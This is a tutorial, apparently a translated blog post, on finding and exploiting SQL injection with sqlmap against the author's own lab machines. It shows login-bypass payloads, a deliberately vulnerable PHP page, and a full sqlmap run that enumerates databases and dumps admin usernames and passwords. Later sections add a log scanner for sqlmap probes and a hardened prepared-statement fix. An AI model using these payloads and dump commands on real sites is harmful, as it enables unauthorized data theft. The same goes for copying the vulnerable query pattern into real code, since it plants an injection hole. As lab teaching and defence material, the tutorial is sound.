SQL injection with sqlmap
There is a tool called sqlmap that is mainly used to identify SQL injection vulnerabilities and exploit them; here I write a tutorial on how to use it.
Because SQL injection is illegal, I use two of my own virtual machines for testing; please do not cause damage on other people's websites. (Most websites no longer have SQL injection vulnerabilities today, and the fix is simple.)
1. What is a SQL injection vulnerability
To understand SQL injection vulnerabilities, you first need to understand SQL statements. SQL stands for Structured Query Language; it is a programming language used mainly for querying databases. The databases typically installed on servers include Microsoft Access, MySQL, PostgreSQL and so on. Here I use MySQL. Below are a few query examples.
SELECT * FROM admin WHERE user = "test" AND pass = "123456";
This statement looks in the admin table for records where user is test and pass is 123456 and outputs the matching records; a typical login page runs exactly this kind of query.
But if the password I enter is " OR "1"="1 and the username is test, doesn't the SQL statement become
SELECT * FROM admin WHERE user = "test" AND pass = "" OR "1"="1";
Clearly the expression after WHERE always returns true, so MySQL outputs every record, and the website mistakenly assumes the username is correct and logs you in as test.
If the site also has an administrative-privilege flag, you can try the password " OR "1"="1" AND writable = TRUE AND ""=" , so that the SQL query becomes
SELECT * FROM admin WHERE user = "test" AND pass = "" OR "1"="1" AND writable = TRUE AND ""="";
Here user = "test" AND pass = "" OR "1"="1" always returns true (strictly, since AND binds tighter than OR, MySQL parses the condition as (user = "test" AND pass = "") OR ("1"="1" AND writable = TRUE AND ""=""), which comes to the same thing because the first branch is false), so the effective condition is writable = TRUE AND ""="", i.e. writable = TRUE, and MySQL outputs the records whose writable is true.
Another case is viewing an article, which is usually queried through a GET parameter id:
SELECT * FROM articles WHERE id = 1;
If the site does not validate id, try id=1 AND 1=1 as a test:
SELECT * FROM articles WHERE id = 1 AND 1=1;
If there is no error, injection may be possible. Change it to id=1 AND 1=2; if the site says the article was not found, that further suggests injection is possible. Then change it to id="; if MySQL raises an error, which most sites display, the page can basically be considered injectable.
I will use this example for the injection.
2. Setting up the environment
I chose Kali Linux 17.3 as the attacker and Ubuntu 18.04 LTS as the victim server. First set up the server (see "How to set up an Apache2 + PHP 5.6 + MySQL server on Ubuntu 18.04"), then put the injectable page at /article.php with the following code.
<?php
if (!isset($_GET['id'])) {
    echo '没有设置参数id';
    die(1);
}
$host = 'localhost';
$user = 'test';
$pass = '123456';
$conn = mysql_connect($host, $user, $pass);
if (!$conn) {
    echo '无法连接至数据库';
    die(1); // stop here; the original continued without a connection
}
$sql = 'SELECT * FROM website.articles WHERE id = ' . $_GET['id']; // the vulnerability is here: id is concatenated into the query unchecked
$query = mysql_query($sql, $conn);
$row = mysql_fetch_array($query);
if (!$row) {
    echo '访问的文章不存在';
} else {
    echo $row['content'];
}
mysql_close($conn);
?>
After the whole site is set up, the database in MySQL looks like this: [screenshot]
Of course, I am not injecting to read those few articles; I can see them directly through the web page anyway. The goal is to reach private data, such as the accounts and passwords in the admin table.
3. Testing before injection
The server address is 192.168.3.59. First visit the page to check whether it can be injected.
Clearly the page itself works fine. Now test with id=".
Clearly MySQL found a syntax error in the SQL, so there is no query result at all.
This matches expectations exactly, which shows the page can be injected.
4. Injecting with sqlmap
On Kali Linux, sqlmap is installed by default. On Ubuntu, install it with apt install sqlmap. On other systems, download the source from the official site; sqlmap is written in Python, so you may need to install Python.
Now start the injection.
sqlmap -u '192.168.3.59/article.php?id=1'
The GET parameter must be included, otherwise sqlmap does not know which parameter to inject. The output looks roughly like this:
root@kali:~# sqlmap -u '192.168.3.59/article.php?id=1'
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.1.11#stable}
|_ -| . [.]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 11:30:43

[11:30:43] [INFO] resuming back-end DBMS 'mysql'
[11:30:43] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 1817=1817

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=1 AND SLEEP(5)

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: id=-2184 UNION ALL SELECT NULL,CONCAT(0x716b707071,0x517964767671746351415543654b4b794171664b78754b57434b70774c6b56434b6a46786a4d5a76,0x717a706271)-- BgjA
---
[11:30:43] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.29
back-end DBMS: MySQL >= 5.0.12
[11:30:43] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.3.59'

[*] shutting down at 11:30:43
From the output above the page can be injected, so now the injection proper begins.
sqlmap -u '192.168.3.59/article.php?id=1' --dbs
The output is:
root@kali:~# sqlmap -u '192.168.3.59/article.php?id=1' --dbs
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.1.11#stable}
|_ -| . [,]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 11:37:43

[11:37:43] [INFO] resuming back-end DBMS 'mysql'
[11:37:43] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 1817=1817

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=1 AND SLEEP(5)

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: id=-2184 UNION ALL SELECT NULL,CONCAT(0x716b707071,0x517964767671746351415543654b4b794171664b78754b57434b70774c6b56434b6a46786a4d5a76,0x717a706271)-- BgjA
---
[11:37:43] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.29
back-end DBMS: MySQL >= 5.0.12
[11:37:43] [INFO] fetching database names
[11:37:43] [INFO] the SQL query used returns 2 entries
[11:37:43] [INFO] retrieved: information_schema
[11:37:43] [INFO] retrieved: website
available databases [2]:
[*] information_schema
[*] website

[11:37:43] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.3.59'

[*] shutting down at 11:37:43
The injection found two databases, information_schema and website. information_schema mainly holds MySQL's metadata about databases, tables and columns, so there is nothing of interest there; website holds the site's data, so that is the database to inject.
sqlmap -u '192.168.3.59/article.php?id=1' -D website --tables
The output is:
root@kali:~# sqlmap -u '192.168.3.59/article.php?id=1' -D website --tables
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.1.11#stable}
|_ -| . [.]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 11:41:14

[11:41:14] [INFO] resuming back-end DBMS 'mysql'
[11:41:14] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 1817=1817

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=1 AND SLEEP(5)

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: id=-2184 UNION ALL SELECT NULL,CONCAT(0x716b707071,0x517964767671746351415543654b4b794171664b78754b57434b70774c6b56434b6a46786a4d5a76,0x717a706271)-- BgjA
---
[11:41:14] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.29
back-end DBMS: MySQL >= 5.0.12
[11:41:14] [INFO] fetching tables for database: 'website'
[11:41:14] [INFO] the SQL query used returns 2 entries
[11:41:14] [INFO] retrieved: admin
[11:41:14] [INFO] retrieved: articles
Database: website
[2 tables]
+----------+
| admin    |
| articles |
+----------+

[11:41:14] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.3.59'

[*] shutting down at 11:41:14
Two tables were found, admin and articles; an attacker will of course inject admin.
sqlmap -u '192.168.3.59/article.php?id=1' -D website -T admin --columns
The output is:
root@kali:~# sqlmap -u '192.168.3.59/article.php?id=1' -D website -T admin --columns
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.1.11#stable}
|_ -| . [(]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 11:43:46

[11:43:46] [INFO] resuming back-end DBMS 'mysql'
[11:43:46] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 1817=1817

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=1 AND SLEEP(5)

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: id=-2184 UNION ALL SELECT NULL,CONCAT(0x716b707071,0x517964767671746351415543654b4b794171664b78754b57434b70774c6b56434b6a46786a4d5a76,0x717a706271)-- BgjA
---
[11:43:46] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.29
back-end DBMS: MySQL >= 5.0.12
[11:43:46] [INFO] fetching columns for table 'admin' in database 'website'
[11:43:47] [INFO] the SQL query used returns 3 entries
[11:43:47] [INFO] retrieved: "id","int(11)"
[11:43:47] [INFO] retrieved: "user","text"
[11:43:47] [INFO] retrieved: "pass","text"
Database: website
Table: admin
[3 columns]
+--------+---------+
| Column | Type    |
+--------+---------+
| user   | text    |
| id     | int(11) |
| pass   | text    |
+--------+---------+

[11:43:47] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.3.59'

[*] shutting down at 11:43:47
The injection yielded three columns, user, id and pass; obtaining user and pass gives the passwords (usually the login password for the site's admin back end).
sqlmap -u '192.168.3.59/article.php?id=1' -D website -T admin -C user,pass --dump
The output is:
root@kali:~# sqlmap -u '192.168.3.59/article.php?id=1' -D website -T admin -C user,pass --dump
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.1.11#stable}
|_ -| . [.]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 11:47:33

[11:47:33] [INFO] resuming back-end DBMS 'mysql'
[11:47:33] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 1817=1817

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=1 AND SLEEP(5)

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: id=-2184 UNION ALL SELECT NULL,CONCAT(0x716b707071,0x517964767671746351415543654b4b794171664b78754b57434b70774c6b56434b6a46786a4d5a76,0x717a706271)-- BgjA
---
[11:47:33] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.29
back-end DBMS: MySQL >= 5.0.12
[11:47:33] [INFO] fetching entries of column(s) '`user`, pass' for table 'admin' in database 'website'
[11:47:33] [INFO] the SQL query used returns 3 entries
[11:47:33] [INFO] retrieved: "test1","123456"
[11:47:33] [INFO] retrieved: "test2","123456"
[11:47:33] [INFO] retrieved: "test3","123456"
Database: website
Table: admin
[3 entries]
+--------+--------+
| user   | pass   |
+--------+--------+
| test1  | 123456 |
| test2  | 123456 |
| test3  | 123456 |
+--------+--------+

[11:47:33] [INFO] table 'website.admin' dumped to CSV file '/root/.sqlmap/output/192.168.3.59/dump/website/admin.csv'
[11:47:33] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.3.59'

[*] shutting down at 11:47:33
The administrator accounts and passwords were obtained successfully, and the injection ends here.
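Every probe sqlmap sent above is visible in the Apache access log as a request to article.php whose id is not a plain integer. The following PHP script, an added example that is not part of the original post, scans constructed log lines for such requests and labels them with the probe types sqlmap reported (boolean-based, time-based, UNION); the log lines and the client address 192.168.3.1 are made up.

```php
<?php
// Added example, not part of the original post: scan Apache access-log lines
// for requests to article.php whose id is not a plain integer and label those
// matching the probe shapes sqlmap reported above. Log lines are constructed.

// Signatures derived from the payloads listed in the sqlmap output above.
const PROBE_PATTERNS = [
    'boolean-based blind' => '/\bAND\s+\d+\s*=\s*\d+\b/i',
    'time-based blind'    => '/\bSLEEP\s*\(\s*\d+\s*\)/i',
    'UNION query'         => '/\bUNION\s+(?:ALL\s+)?SELECT\b/i',
];

// Returns one ['id' => ..., 'verdicts' => [...]] entry per suspicious request.
function find_suspicious_ids(array $logLines): array
{
    $findings = [];
    foreach ($logLines as $line) {
        // Request field of the combined log format: "GET /path?query HTTP/1.1"
        if (!preg_match('/"(?:GET|POST) (\S+) HTTP\/[\d.]+"/', $line, $m)) {
            continue;
        }
        $parts = parse_url($m[1]);
        if (($parts['path'] ?? '') !== '/article.php' || empty($parts['query'])) {
            continue;
        }
        parse_str($parts['query'], $params);   // also URL-decodes the values
        $id = $params['id'] ?? null;
        if ($id === null || ctype_digit((string) $id)) {
            continue;                          // a legitimate article lookup
        }
        $verdicts = [];
        foreach (PROBE_PATTERNS as $name => $regex) {
            if (preg_match($regex, (string) $id)) {
                $verdicts[] = $name;
            }
        }
        $findings[] = ['id' => $id, 'verdicts' => $verdicts ?: ['malformed id (stray quote or other non-digit)']];
    }
    return $findings;
}

$sampleLog = [   // constructed samples; 192.168.3.1 is a made-up client address
    '192.168.3.1 - - [10/Jun/2018:11:30:43 +0800] "GET /article.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.168.3.1 - - [10/Jun/2018:11:30:44 +0800] "GET /article.php?id=1%20AND%201817%3D1817 HTTP/1.1" 200 512 "-" "sqlmap/1.1.11#stable (http://sqlmap.org)"',
    '192.168.3.1 - - [10/Jun/2018:11:30:45 +0800] "GET /article.php?id=1%20AND%20SLEEP(5) HTTP/1.1" 200 512 "-" "sqlmap/1.1.11#stable (http://sqlmap.org)"',
    '192.168.3.1 - - [10/Jun/2018:11:30:46 +0800] "GET /article.php?id=%22 HTTP/1.1" 200 480 "-" "Mozilla/5.0"',
];
foreach (find_suspicious_ids($sampleLog) as $f) {
    printf("id=%s -> %s\n", $f['id'], implode(', ', $f['verdicts']));
}
```

The first sample line (id=1) is silently accepted; the other three are reported, the last one as a malformed id because the quote probe from section 3 matches none of the sqlmap signatures.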
5. How to fix SQL injection vulnerabilities
Taking my page's vulnerability as the example, the code before the fix is:
<?php
if (!isset($_GET['id'])) {
    echo '没有设置参数id';
    die(1);
}
$host = 'localhost';
$user = 'test';
$pass = '123456';
$conn = mysql_connect($host, $user, $pass);
if (!$conn) {
    echo '无法连接至数据库';
    die(1); // stop here; the original continued without a connection
}
$sql = 'SELECT * FROM website.articles WHERE id = ' . $_GET['id']; // the vulnerability is here: id is concatenated into the query unchecked
$query = mysql_query($sql, $conn);
$row = mysql_fetch_array($query);
if (!$row) {
    echo '访问的文章不存在';
} else {
    echo $row['content'];
}
mysql_close($conn);
?>
The cause of the SQL injection is that illegal characters from the input are used in the query, so there are many ways to fix it:
- Validate the parameter, for example check that id is an integer.
- Escape strings, since quotes sometimes cannot be avoided; in PHP you can use the addslashes function.
- Install off-the-shelf software (I don't know how it works, but many sites seem to install something like D盾).
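As an added example that is not the original post's code, here is article.php rewritten with the first two fixes: id is validated as a positive integer, and the query runs as a mysqli prepared statement instead of string concatenation (prepared statements, rather than addslashes, which is not MySQL- or charset-aware, are the standard fix; the same pattern closes the login-query bypass from section 1). It assumes the tutorial's website.articles table and the test/123456 credentials.

```php
<?php
// Added example, not the original post's code: article.php hardened with the
// first two fixes listed above. Assumes the same website.articles table and
// the same test/123456 credentials as the tutorial's setup.

// Fix 1: validate the parameter. id must be a positive integer; values such
// as "1 AND 1=2" or a stray quote are rejected before any SQL is built.
$id = filter_input(INPUT_GET, 'id', FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
if ($id === null) {            // parameter absent
    echo 'parameter id not set';
    exit(1);
}
if ($id === false) {           // parameter present but not a positive integer
    http_response_code(400);
    echo 'invalid id';
    exit(1);
}

// Fix 2: keep the value out of the SQL text altogether. A prepared statement
// sends the query and the parameter separately, so no quoting trick in the
// input can change the statement's structure, which is what addslashes-style
// escaping tries to guarantee by rewriting the string and can get wrong.
mysqli_report(MYSQLI_REPORT_OFF);   // return errors instead of throwing, on every PHP version
$conn = new mysqli('localhost', 'test', '123456', 'website');
if ($conn->connect_error) {
    // Log the real reason server-side; the client only gets a generic message,
    // so MySQL error text never becomes the oracle used in section 3.
    error_log('DB connect failed: ' . $conn->connect_error);
    echo 'cannot connect to the database';
    exit(1);
}
$stmt = $conn->prepare('SELECT content FROM articles WHERE id = ?');
if ($stmt === false) {
    error_log('prepare failed: ' . $conn->error);
    echo 'internal error';
    exit(1);
}
$stmt->bind_param('i', $id);   // 'i': bind the value as an integer
$stmt->execute();
$stmt->bind_result($content);
if ($stmt->fetch()) {
    echo $content;
} else {
    echo 'article not found';
}
$stmt->close();
$conn->close();
```

With this version, id=1 AND 1=2 and id=" both receive a 400 response without any query being sent, so the tests from section 1 and section 3 no longer distinguish the page from a non-injectable one.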
6. In practice
In reality, SQL injection is not always this simple. Sometimes you need a wordlist to guess table names (Kali ships with wordlists), sometimes injection fails entirely (possibly because the wordlist is insufficient), and even if the injection succeeds and you obtain the password, you may not find the login entry point (usually in an admin or login folder). So this article only provides a method and cannot guarantee a successful injection; I hope it is helpful.